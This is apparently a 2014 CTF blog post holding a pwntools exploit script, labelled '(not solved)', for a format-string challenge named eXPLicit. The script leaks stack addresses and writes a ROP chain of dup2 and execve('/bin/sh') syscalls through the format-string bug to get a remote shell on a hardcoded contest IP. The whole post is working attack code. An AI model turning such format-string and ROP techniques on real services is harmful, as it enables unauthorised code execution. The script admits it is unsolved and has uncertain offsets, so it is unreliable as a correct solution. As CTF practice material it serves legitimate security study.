Monday, September 15, 2014

eXPLicit

eXPLicit (not solved) source
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
from libformatstr import *

REMOTE = 0

# Target selection: the contest service when REMOTE is truthy, otherwise a
# local instance listening on the same port.
host = '88.87.208.163' if REMOTE else '127.0.0.1'
port = 7070

def connect():
    """Open a pwntools connection to the module-level host/port target."""
    target = (host, port)
    return remote(*target)

def retrieve_val(res):
    """Pull the echoed value out of the service's "too low" response.

    Returns the captured text (whatever sits between "Your number is " and
    " which is too low."), or None when the response does not match.
    """
    match = re.search('Your number is (.+) which is too low.', res)
    return match.group(1) if match else None

def dump_stack():
    # Diagnostic helper: walks format-string argument indexes 1..99 and prints
    # whatever the service echoes back for each one. Uses the module-level
    # connection `s` and drops into an interactive session afterwards.
    for i in range(1, 100):
        payload = (
            "%%%d$x" % i +
            '\n'
        )
        s.sendafter('Pick a number between 0 and 20: ', payload)
        res = s.recvuntil('which is too low.')
        leak = retrieve_val(res)
        if leak:
            print '%d: %s' % (i, leak)
        else:
            # NOTE(review): `buf` is a module global assigned further down the
            # file, not this iteration's response; calling dump_stack() before
            # that assignment raises NameError. `res` looks like what was meant.
            print buf
    s.interactive()

def send_fmt(payload):
    """Submit one payload as the "number" answer, newline-terminated, over `s`."""
    line = payload + '\n'
    s.sendafter('Pick a number between 0 and 20: ', line)

# All addresses below are hardcoded for this particular challenge binary (the
# gadget semantics are the author's inline notes); they mean nothing against
# any other build.
bss = 0x80d6080 + 0x100  # scratch area in .bss used for the execve argv/path block

int80 = 0x8082715  # int 0x80; ret
popeax = 0x80a8ff6 # pop eax; ret
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret

s = connect()

#dump_stack()

# Leak one stack word through the format string (argument index 69) and derive
# the address the chain below is written to. The 76-byte adjustment is specific
# to this binary's stack layout — NOTE(review): not derivable from this file;
# the "(not solved)" title suggests it may not be right.
send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
retaddr = int(retrieve_val(buf), 16) - 76 # offset
log.info('retaddr = %x' % retaddr)

# Each FormatStr below uses the format-string write primitive to place one
# syscall frame at retaddr (syscall number into eax via popeax, arguments via
# the pop gadgets, then int 0x80), then advances retaddr past it. The `6`
# passed to payload() is the format-string argument index libformatstr
# writes through — NOTE(review): assumed, confirm against dump_stack output.

# dup2(4, 0): eax=0x3f, ecx=0 (new fd), ebx=4 (fd being duplicated)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6

# dup2(4, 1): identical frame except ecx=1, so this one targets stdout
# (the original comment repeated "dup2(4, 0)", which does not match ecx=1 below).
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 1
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6

# execve("/bin/sh", ["/bin/sh", NULL], NULL): eax=0x0b, edx=0 (envp),
# ecx=bss+4 (argv array), ebx=bss+12 (path string); both point into the
# .bss block filled in by the last write below.
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x0b
p[retaddr+4*2] = popedx_ecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = bss+4*1
p[retaddr+4*5] = bss+4*3
p[retaddr+4*6] = int80
send_fmt(p.payload(6))

# ["/bin/sh", NULL]: bss+4 -> "/bin/sh", bss+8 -> NULL, the string itself
# lives at bss+12..bss+19 (two 4-byte writes, NUL-terminated).
# NOTE(review): bss+0 receives retaddr+4; its role is not evident from this file.
p = FormatStr()
p[bss] = retaddr+4*1
p[bss+4*1] = bss+4*3
p[bss+4*2] = 0
p[bss+4*3] = '/bin'
p[bss+4*4] = '/sh\0'
send_fmt(p.payload(6))

s.interactive()

